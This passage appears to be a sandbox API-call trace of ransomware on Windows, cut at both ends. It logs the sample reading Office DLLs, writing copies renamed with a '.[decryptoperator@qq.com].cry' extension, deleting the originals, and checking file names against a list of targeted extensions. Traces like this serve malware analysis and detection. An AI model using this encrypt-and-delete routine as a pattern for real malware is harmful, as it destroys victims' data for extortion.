dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0053.807] GetLastError () returned 0x0 [0053.807] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0xdbb98, lpOverlapped=0x0) returned 1 [0054.002] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xdbba0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xdbba0, lpOverlapped=0x0) returned 1 [0054.019] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.019] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.019] SetEndOfFile (hFile=0x21c) returned 1 [0054.019] CloseHandle (hObject=0x21c) returned 1 [0054.020] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.020] SetEndOfFile (hFile=0x1c4) returned 1 [0054.027] CloseHandle (hObject=0x1c4) returned 1 [0054.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.027] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll")) returned 1 [0054.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.027] lstrlenW (lpString=".doc") returned 4 [0054.027] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.027] lstrlenW (lpString=".docx") returned 5 [0054.027] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.027] lstrlenW (lpString=".pdf") returned 4 [0054.027] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.027] lstrlenW (lpString=".xls") returned 4 [0054.027] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.027] lstrlenW (lpString=".xlsx") returned 5 [0054.027] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.027] lstrlenW (lpString=".ppt") returned 4 [0054.027] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.027] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.027] lstrlenW (lpString=".zip") returned 4 [0054.027] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.027] lstrlenW (lpString=".rar") returned 4 [0054.027] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString=".bz2") returned 4 [0054.028] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.028] lstrlenW (lpString=".7z") returned 3 [0054.028] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.028] lstrlenW (lpString=".dbf") returned 4 [0054.028] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.028] lstrlenW (lpString=".1cd") returned 4 [0054.028] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.028] lstrlenW (lpString=".jpg") returned 4 [0054.028] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.028] lstrlenW (lpString=".doc") returned 4 [0054.028] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString=".docx") returned 5 [0054.028] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.028] lstrlenW (lpString=".pdf") returned 4 [0054.028] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString=".xls") returned 4 [0054.028] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString=".xlsx") returned 5 [0054.028] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.028] lstrlenW (lpString=".ppt") returned 4 [0054.028] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.028] lstrlenW (lpString=".zip") returned 4 [0054.028] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString=".rar") returned 4 [0054.028] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.028] lstrlenW (lpString=".bz2") returned 4 [0054.028] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.028] lstrlenW (lpString=".7z") returned 3 [0054.028] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.028] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.029] lstrlenW (lpString=".dbf") returned 4 [0054.029] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.029] lstrlenW (lpString=".1cd") returned 4 [0054.029] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.029] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 67 [0054.029] lstrlenW (lpString=".jpg") returned 4 [0054.029] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.029] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.029] lstrlenW (lpString="ACEODDBS.DLL") returned 12 [0054.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.029] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=15800) returned 1 [0054.030] CloseHandle (hObject=0x1c4) returned 1 [0054.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 0x20 [0054.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.030] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.030] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0054.031] GetLastError () returned 0x0 [0054.031] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0054.215] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0054.217] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.217] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.217] SetEndOfFile (hFile=0x21c) returned 1 [0054.217] CloseHandle (hObject=0x21c) returned 1 [0054.217] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.217] SetEndOfFile (hFile=0x1c4) returned 1 [0054.218] CloseHandle (hObject=0x1c4) returned 1 [0054.218] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.219] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString=".doc") returned 4 [0054.220] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.220] lstrlenW (lpString=".docx") returned 5 [0054.220] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0054.220] lstrlenW (lpString=".pdf") returned 4 [0054.220] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.220] lstrlenW (lpString=".xls") returned 4 [0054.220] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.220] lstrlenW (lpString=".xlsx") returned 5 [0054.220] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0054.220] lstrlenW (lpString=".ppt") returned 4 [0054.220] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString=".zip") returned 4 [0054.220] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.220] lstrlenW (lpString=".rar") returned 4 [0054.220] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.220] lstrlenW (lpString=".bz2") returned 4 [0054.220] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.220] lstrlenW (lpString=".7z") returned 3 [0054.220] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString=".dbf") returned 4 [0054.220] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString=".1cd") returned 4 [0054.220] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString=".jpg") returned 4 [0054.220] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.220] lstrlenW (lpString=".doc") returned 4 [0054.221] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.221] lstrlenW (lpString=".docx") returned 5 [0054.221] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0054.221] lstrlenW (lpString=".pdf") returned 4 [0054.221] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.221] lstrlenW (lpString=".xls") returned 4 [0054.221] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.221] lstrlenW (lpString=".xlsx") returned 5 [0054.221] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0054.221] lstrlenW (lpString=".ppt") returned 4 [0054.221] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.221] lstrlenW (lpString=".zip") returned 4 [0054.221] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.221] lstrlenW (lpString=".rar") returned 4 [0054.221] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.221] lstrlenW (lpString=".bz2") returned 4 [0054.221] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.221] lstrlenW (lpString=".7z") returned 3 [0054.221] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.221] lstrlenW (lpString=".dbf") returned 4 [0054.221] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.221] lstrlenW (lpString=".1cd") returned 4 [0054.221] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0054.221] lstrlenW (lpString=".jpg") returned 4 [0054.221] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.221] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.221] lstrlenW (lpString="ACEOLEDB.DLL") returned 12 [0054.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.222] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=537504) returned 1 [0054.222] CloseHandle (hObject=0x1c4) returned 1 [0054.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 0x20 [0054.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.223] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.223] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0054.223] GetLastError () returned 0x0 [0054.223] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x833a0, lpOverlapped=0x0) returned 1 [0054.288] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x833b0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x833b0, lpOverlapped=0x0) returned 1 [0054.305] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.305] WriteFile (in: hFile=0x21c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.305] SetEndOfFile (hFile=0x21c) returned 1 [0054.305] CloseHandle (hObject=0x21c) returned 1 [0054.305] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.305] SetEndOfFile (hFile=0x1c4) returned 1 [0054.318] CloseHandle (hObject=0x1c4) returned 1 [0054.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.318] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll")) returned 1 [0054.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.319] lstrlenW (lpString=".doc") returned 4 [0054.319] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.319] lstrlenW (lpString=".docx") returned 5 [0054.319] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1 [0054.319] lstrlenW (lpString=".pdf") returned 4 [0054.319] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.319] lstrlenW (lpString=".xls") returned 4 [0054.319] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.319] lstrlenW (lpString=".xlsx") returned 5 [0054.319] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1 [0054.320] lstrlenW (lpString=".ppt") returned 4 [0054.320] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.320] lstrlenW (lpString=".zip") returned 4 [0054.320] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString=".rar") returned 4 [0054.320] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString=".bz2") returned 4 [0054.320] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.320] lstrlenW (lpString=".7z") returned 3 [0054.320] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.320] lstrlenW (lpString=".dbf") returned 4 [0054.320] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.320] lstrlenW (lpString=".1cd") returned 4 [0054.320] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.320] lstrlenW (lpString=".jpg") returned 4 [0054.320] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.320] lstrlenW (lpString=".doc") returned 4 [0054.320] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString=".docx") returned 5 [0054.320] lstrcmpiW (lpString1=".docx", lpString2="B.DLL") returned -1 [0054.320] lstrlenW (lpString=".pdf") returned 4 [0054.320] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString=".xls") returned 4 [0054.320] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString=".xlsx") returned 5 [0054.320] lstrcmpiW (lpString1=".xlsx", lpString2="B.DLL") returned -1 [0054.320] lstrlenW (lpString=".ppt") returned 4 [0054.320] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.320] lstrlenW (lpString=".zip") returned 4 [0054.321] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.321] lstrlenW (lpString=".rar") returned 4 [0054.321] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.321] lstrlenW (lpString=".bz2") returned 4 [0054.321] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.321] lstrlenW (lpString=".7z") returned 3 [0054.321] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.321] lstrlenW (lpString=".dbf") returned 4 [0054.321] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.321] lstrlenW (lpString=".1cd") returned 4 [0054.321] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 68 [0054.321] lstrlenW (lpString=".jpg") returned 4 [0054.321] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.321] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0054.321] lstrlenW (lpString="ACEWDAT.DLL") returned 11 [0054.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.322] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3050912) returned 1 [0054.322] CloseHandle (hObject=0x1c4) returned 1 [0054.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll")) returned 0x20 [0054.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0054.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0054.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0054.323] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0054.323] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.323] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.360] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xf848a, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.360] 